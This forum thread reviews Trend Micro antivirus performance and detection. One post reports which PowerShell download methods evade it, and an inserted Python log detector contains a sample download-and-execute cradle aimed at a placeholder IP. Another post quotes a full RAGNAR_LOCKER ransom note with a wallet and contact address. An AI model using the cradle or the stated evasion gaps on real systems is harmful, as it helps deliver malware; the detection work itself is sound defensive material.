Updates Trend Micro Improvements

McMcbrad

Level 23
Oct 16, 2020
1,252
Following the @JoeN test of Trend Micro, located here:

I would like to share observations from Trend Micro I've made today:

I won't be talking about detection; with TM this is a bit above average, but not top.
They have, however, improved performance very seriously. I can see that there has been a software revamp, as the core services have changed.
There is a "Trend Micro Activity Data Service" and "Trend Micro Browser Exploit Detection", which are new. Most likely they have moved the code to new services to improve stability.

On idle, there was a constant 2-3% activity before, but now there is rarely any and it doesn't even reach 1%.

On app launch, before I saw 30-40% CPU activity; now it varies between 5-10% and only the first time you open an app. Disk usage goes up to 50-100 MB (my total read speed is about 1800).

On browsing, CPU usage is less than 1%, which is amongst the lowest in the industry.

On scan, the CPU usage seems to have been limited to 20%.

The system overall feels very responsive and snappy with Trend Micro installed, which is, again, different from before.

If any users have criticised TM for their performance before, it might be worth giving them a try now and see where they stand today.

I would also like to bring to your attention that *some* changes have been made to their engine, at least from a classification point of view. Before, most threats had generic names, but today it seems to be a bit more precise.


One nonsense I noticed is that when you download a file, it says there are no threats. 3-4 seconds later, it displays a message that it has removed the same file. This might be a bit confusing to users.

 

sepik

Level 11
Aug 21, 2018
526
Yeah, I was a beta tester of their v17 product and the beta was way faster than their previous v16. It's getting better and better in terms of lightness. Sure, it's not as snappy as, for example, F-Secure, but it's way better than what it was a year ago. It's good against ransomware and scripts and its BB is very good. Because TM relies heavily on the cloud, its offline detection is below average and, for some reason, with false positives you actually need to run the .exe twice before you can allow the file to run (via TM popup). Overall it's a solid product and I like it. It's installed on one of my laptops.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
Yeah, I was a beta tester of their v17 product and the beta was way faster than their previous v16. It's getting better and better in terms of lightness. Sure, it's not as snappy as, for example, F-Secure, but it's way better than what it was a year ago. It's good against ransomware and scripts and its BB is very good. Because TM relies heavily on the cloud, its offline detection is below average and, for some reason, with false positives you actually need to run the .exe twice before you can allow the file to run (via TM popup). Overall it's a solid product and I like it. It's installed on one of my laptops.
I have sent them some samples today; I am curious how long it will take to process them. I sent them just a few minutes ago via email and had to contact support, as they only allow business customers with valid product keys to submit via the official portal. Once I get a response or notice they are detected, I will post an update.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
It's good against ransomware and scripts
Following this statement I got very interested in playing around with it and created a few PowerShell loaders.
I found out that System.Net.WebClient is blocked entirely. Obfuscated or not, with a browser agent or without, it is impossible to use it with Trend Micro on. This is the most popular method attackers use.
It's also blocked in .NET languages, for example if you embed it in a document and try to run it with cscript or wscript.

Invoke-WebRequest, cscript download and BITS are not blocked at all, unless the domain is blacklisted. In that case Trend Micro blocks the download, but displays no message and leaves a 2 KB file.
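The post above shows that only one of the four download primitives is blocked outright, so a defender should log and triage all four rather than trust the AV alone. The following is an added example (not Trend Micro's code, not the poster's loaders) that classifies PowerShell ScriptBlock log text (Event ID 4104, text already extracted one block per line) by primitive used and by whether the fetched content is executed in place; the sample blocks, host names and allow-list are constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Download primitives named in the post; all four should be logged, not just WebClient.
CRADLE_PATTERNS = {
    "WebClient": re.compile(r"\bNet\.WebClient\b", re.I),
    "Invoke-WebRequest": re.compile(r"\bInvoke-WebRequest\b|\biwr\b", re.I),
    "BITS": re.compile(r"\bStart-BitsTransfer\b|\bbitsadmin(?:\.exe)?\b", re.I),
    "ScriptHost": re.compile(r"\b[cw]script(?:\.exe)?\b", re.I),
}
EXEC_RE = re.compile(r"\bIEX\b|\bInvoke-Expression\b", re.I)  # fetched content run in place
HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)

@dataclass
class Finding:
    line_no: int
    method: str
    host: Optional[str]
    severity: str

def classify(line_no: int, block: str, allowed_hosts: set) -> Optional[Finding]:
    """Return a Finding when the script block uses a monitored download primitive."""
    method = next((n for n, rx in CRADLE_PATTERNS.items() if rx.search(block)), None)
    if method is None:
        return None
    m = HOST_RE.search(block)
    host = m.group(1).lower() if m else None
    if EXEC_RE.search(block):
        severity = "high"    # download piped straight into execution
    elif host is None or host not in allowed_hosts:
        severity = "medium"  # fetch from a host nobody vetted
    else:
        severity = "low"     # fetch from an allow-listed host, keep for audit only
    return Finding(line_no, method, host, severity)

def scan(blocks, allowed_hosts):
    """Classify every script block; blocks are numbered from 1 like log lines."""
    return [f for i, b in enumerate(blocks, 1) if (f := classify(i, b, allowed_hosts))]

# Constructed 4104 ScriptBlockText samples (hosts are documentation/TEST-NET addresses).
SAMPLE_BLOCKS = [
    r"Get-ChildItem C:\Users\tv\Videos | Measure-Object",
    r"Invoke-WebRequest -Uri https://updates.example.com/list.txt -OutFile C:\tmp\list.txt",
    r"Start-BitsTransfer -Source http://cdn.example.net/tool.zip -Destination C:\tmp\tool.zip",
    r"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.txt')",
    r"cscript.exe //nologo C:\tmp\dl.vbs http://192.0.2.10/a.txt",
]
ALLOWED_HOSTS = {"updates.example.com"}
```

Feed it the `ScriptBlockText` field of real 4104 events and the "medium" findings are exactly the downloads the post says pass silently unless the domain is already blacklisted.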
 

McMcbrad

Level 23
Oct 16, 2020
1,252
Contradicting any logic, I installed TM on a very slow PC, at the low end of the scale.
It's slow due to the HDD, which has a reading speed of ~20 megs, 5400 RPM and a long seek time.
Other than that, the PC has a Pentium N3530 CPU @ 2.16 GHz and 4 GB DDR3 RAM.
As the HDD is at the beginning of the software execution chain, everything else is slowed down. I decided to do that after I noticed very low disk activity from TM on my malware testing laptop.

It might seem like madness to install an AV that stands almost at the end of the AV-Comparatives Performance scale, but due to the lack of constant updates/definitions and the cloud, it runs better with TM compared to other AVs.

It also starts faster, as TM updates are very infrequent and very small. With AVG and others, there was 20-30% CPU activity & 50-60% disk usage after system boot, whilst they performed their update process. Software launch, such as Chrome, which for that PC is like Photoshop, feels faster than before (I had McAfee and AVG on that laptop).

I haven't installed Password Manager and have turned off Ransomware Protection, as this PC is only used for watching TV and nothing else. It will hardly suffer a ransomware attack. Other than that, I haven't modified any settings.

TM might be a good choice for PCs with average CPU & RAM, but a very mediocre HDD.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
I managed to drive Trend Micro crazy.

I tested it against ransomware called RAGNAR_LOCKER (according to the note).
Hello VGCARGO !

*****************************************************************************************************************

If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED

by RAGNAR_LOCKER !

*****************************************************************************************************************

*********What happens with your system ?************

Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US.
You can google it, there is no CHANCES to decrypt data without our SECRET KEY.

But don't worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY.
We are looking only for MONEY, so there is no interest for us to steel or delete your information, it's just a BUSINESS $-)

HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!!

Also, all of your sensitive and private information were gathered and if you decide NOT to pay,
we will upload it for public view !

****

***********How to get back your files ?******

To decrypt all your files and data you have to pay for the encryption KEY :

BTC wallet for payment: 1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4
Amount to pay (in Bitcoin): 25

****

***********How much time you have to pay?**********

* You should get in contact with us within 2 days after you noticed the encryption to get a better price.

* The price would be increased by 100% (double price) after 14 Days if there is no contact made.

* The key would be completely erased in 21 day if there is no contact made or no deal made.
Some sensetive information stolen from the file servers would be uploaded in public or to re-seller.

****

***********What if files can't be restored ?******

To prove that we really can decrypt your data, we will decrypt one of your locked files !
Just send it to us and you will get it back FOR FREE.

The price for the decryptor is based on the network size, number of employees, annual revenue.
Please feel free to contact us for amount of BTC that should be paid.

****

! IF you don't know how to get bitcoins, we will give you advise how to exchange the money.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

1) Go to the official website of TOX messenger ( A New Kind of Instant Messaging )

2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. )

3) Open messenger, click "New Profile" and create profile.

4) Click "Add friends" button and search our contact

5) For identification, send to our support data from ---RAGNAR SECRET---

IMPORTANT ! IF for some reasons you CAN'T CONTACT us in qTOX, here is our reserve mailbox ( cargowelcome@protonmail.com ) send a message with a data from ---RAGNAR SECRET---



WARNING!

-Do not try to decrypt files with any third-party software (it will be damaged permanently)
-Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER!
-Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME !


***********************************************************************************

---RAGNAR SECRET---

---RAGNAR SECRET---

***********************************************************************************

It generated more than 1K detections from TM in a minute, but nothing could be encrypted. The detections came from the notes themselves.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
Today I have re-visited TMMS and it is fast and so far I like it. I'll see how it performs in the next days.
I like how their threat analysts respond to my submissions... I submit a threat and next day Smart Scan Agent Pattern, Program Inspection Pattern and Threat Correlation Pattern are all updated...
I feel special 😄
I uploaded more than 100 scripts last night. I expect the updates today.
Plus, I like their Rik Ferguson as well. He is talented in the threat research field.
 

The Cog in the Machine

Level 26
Verified
May 10, 2019
1,535
Contradicting any logic, I installed TM on a very slow PC, at the low end of the scale.
It's slow due to the HDD, which has a reading speed of ~20 megs, 5400 RPM and a long seek time.
Other than that, the PC has a Pentium N3530 CPU @ 2.16 GHz and 4 GB DDR3 RAM.
As the HDD is at the beginning of the software execution chain, everything else is slowed down. I decided to do that after I noticed very low disk activity from TM on my malware testing laptop.

It might seem like madness to install an AV that stands almost at the end of the AV-Comparatives Performance scale, but due to the lack of constant updates/definitions and the cloud, it runs better with TM compared to other AVs.

It also starts faster, as TM updates are very infrequent and very small. With AVG and others, there was 20-30% CPU activity & 50-60% disk usage after system boot, whilst they performed their update process. Software launch, such as Chrome, which for that PC is like Photoshop, feels faster than before (I had McAfee and AVG on that laptop).

I haven't installed Password Manager and have turned off Ransomware Protection, as this PC is only used for watching TV and nothing else. It will hardly suffer a ransomware attack. Other than that, I haven't modified any settings.

TM might be a good choice for PCs with average CPU & RAM, but a very mediocre HDD.
In TM settings there are two options regarding performance: one that says extra security and the other extra performance. I wonder which option was activated. Maybe TM activates that differently on each system? On my system the extra security option is selected.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
In TM settings there are two options regarding performance: one that says extra security and the other extra performance. I wonder which option was activated. Maybe TM activates that differently on each system? On my system the extra security option is selected.
I haven’t activated extra performance option, I have only disabled “Scan for Suspicious Files When Computer Starts” or something of this sort.
I have enabled folder shield now, as it doesn’t affect performance at all.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
Waiting for its beta version to be released. This and GData are the two programs I haven't installed on my computer yet that caught my interest.
The last version of TM was only released in September... you'll have to wait for a while :D
However, let all users keep in mind that Trend Micro's architecture is split into many components in 3 groups. Such an architecture doesn't require major updates and upgrades to bring improvements.

Regarding the certificates, no. Trend Micro doesn't install these (at least I didn't see it).
 

blackice

Level 29
Verified
Apr 1, 2019
1,890
I managed to trigger a feature I haven't seen before:

I conducted the test with a Parallax RAT sample, which is signed.

It doesn't mention what vulnerability has been exploited though.
You have a talent for getting people interested in trying different solutions. This is definitely on my radar now.
 